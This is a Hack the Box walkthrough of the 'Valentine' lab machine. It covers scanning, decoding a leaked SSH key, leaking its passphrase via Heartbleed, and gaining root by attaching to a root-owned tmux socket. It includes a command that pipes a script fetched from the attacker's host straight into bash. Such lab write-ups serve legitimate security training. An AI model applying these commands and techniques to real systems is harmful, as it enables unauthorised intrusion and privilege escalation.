Write-Up: HTB Valentine

5 min readNov 23, 2020

Valentine is an easy Linux box on Hack the Box. Let’s jump right in!

First off, run my Mercon script (combines nmap and smbmap/gobuster depending on what the nmap scan finds).

Looking at the output, it looks like we have a basic webserver with an ssh port open.

kali@kali:~/development/Mercon$ ./mercon.py -t Valentine -i 10.10.10.79 -w /usr/share/wordlists/dirb/common.txt 
===== Running Nmap Scan =====
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-14 17:35 EST
Nmap scan report for 10.10.10.79
Host is up (0.025s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after:  2019-02-06T00:45:25
|_ssl-date: 2020-11-14T22:37:04+00:00; +1m18s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 1m17s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.92 seconds

[+] Gobuster Running
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.79/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt
[+] Timeout:        10s
===============================================================
2020/11/14 17:35:47 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.txt (Status: 403)
/.htaccess (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.txt (Status: 403)
/cgi-bin/ (Status: 403)
/decode (Status: 200)
/dev (Status: 301)
/encode (Status: 200)
/index (Status: 200)
/index.php (Status: 200)
/server-status (Status: 403)
===============================================================
2020/11/14 17:36:10 Finished
===============================================================

Time to checkout the homepage before enumerating the directories we found with GoBuster. Nothing too interesting here, but it’s worth noting that the heart logo matches the heartbleed vulnerability logo. Made a note of that and then began jumping into the various directories.

Checking out /dev, it there a few files available. First, let’s look at notes.txt to see if there’s any helpful info that’s been left behind.

The more interesting file is “hype_key” that is full of hex. Time to decode it and see what the developers left us.

Well, this is very nice of them to leave behind. It’s a SSH private key! Unfortunately, it’s password encrypted and attempting to brute force it didn’t work… Well, time to keep enumerating. Let’s jump back over to nmap and see if this server is actually vulnerability to the heartbleed attack.

Lucky for us, it looks like the service is vulnerable :)

kali@kali:~/htb/valentine$ nmap -p 443 --script ssl-heartbleed 10.10.10.79
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-14 18:00 EST
Nmap scan report for 10.10.10.79
Host is up (0.024s latency).

PORT    STATE SERVICE
443/tcp open  https
| ssl-heartbleed: 
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|           
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|       http://www.openssl.org/news/secadv_20140407.txt 
|_      http://cvedetails.com/cve/2014-0160/

Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds

Now it’s time to exploit. Copy the script from exploit db and give it a go (I filtered out lines with empty bytes to reduce noise). The results show some $text variable that looks like it is base-64 encoded.

I edited the script with the following to run the exploit 5 times, just to see if we get anything else from the server. Unfortunately, we didn’t find anything else.

if __name__ == '__main__':
    for x in range(5):
        main()

Decoding the text variable gets us the following string.

kali@kali:~/htb/valentine$ echo aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== | base64 -d
heartbleedbelievethehype

Let’s try this as the ssh key password and see where it gets us. And… it definitely gets us somewhere, a shell on the box!

kali@kali:~/htb/valentine$ ssh -i hype_key hype@10.10.10.79
load pubkey "hype_key": invalid format
Enter passphrase for key 'hype_key': 
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3
hype@Valentine:~$

Send over linpeas to see if we can find anything blatantly wrong that will allow us to escalate our privileges.

hype@Valentine:~/Desktop$ bash <(curl -s http://10.10.14.22:8000/linPEAS/linpeas.sh)

Linpeas highlights a tmux process running as root. Looking it up on google, looks like this is trivial to exploit and get root.

================================( Processes, Cron, Services, Timers & Sockets )================================
[+] Cleaned processes
[i] Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
102         550  0.0  0.1  24076  1252 ?        Ss   14:35   0:00 dbus-daemon[0m --system --fork --activation=upstart
avahi       617  0.0  0.0  32172   468 ?        S    14:35   0:00 avahi-daemon[0m: chroot helper
daemon[0m     1038  0.0  0.0  16900   376 ?        Ss   14:36   0:00 atd
hype       2602  0.0  0.1  92220  1672 ?        S    15:13   0:00 sshd: hype@pts/0    
hype       2603  0.0  0.8  31648  8768 pts/0    Ss   15:13   0:00 -bash
hype       2804  0.1  0.1   4776  1112 pts/0    S+   15:19   0:00 /bin/sh ./linpeas.sh
hype       3355  0.0  0.1  22352  1276 pts/0    R+   15:19   0:00 ps aux
hype       3357  0.0  0.0  19864   808 pts/0    S+   15:19   0:00 sort
root          1  0.0  0.2  24428  2420 ?        Ss   14:35   0:00 /sbin/init
root       1006  0.0  0.0  19976   976 tty2     Ss+  14:36   0:00 /sbin/getty -8 38400 tty2
root       1007  0.0  0.0  19976   976 tty3     Ss+  14:36   0:00 /sbin/getty -8 38400 tty3
root       1010  0.0  0.1  26416  1672 ?        Ss   14:36   0:00 /usr/bin/tmux -S /.devs/dev_sess

Run tmux with the /.devs/dev_sess path for -S (socket-path) and we have root!

hype@Valentine:~/Desktop$ tmux -S /.devs/dev_sess


root@Valentine:/home/hype/Desktop# id
uid=0(root) gid=0(root) groups=0(root)

Overall, this was a fun box to go through. Thanks for reading!

Write-Up: HTB Valentine

Written by Mertle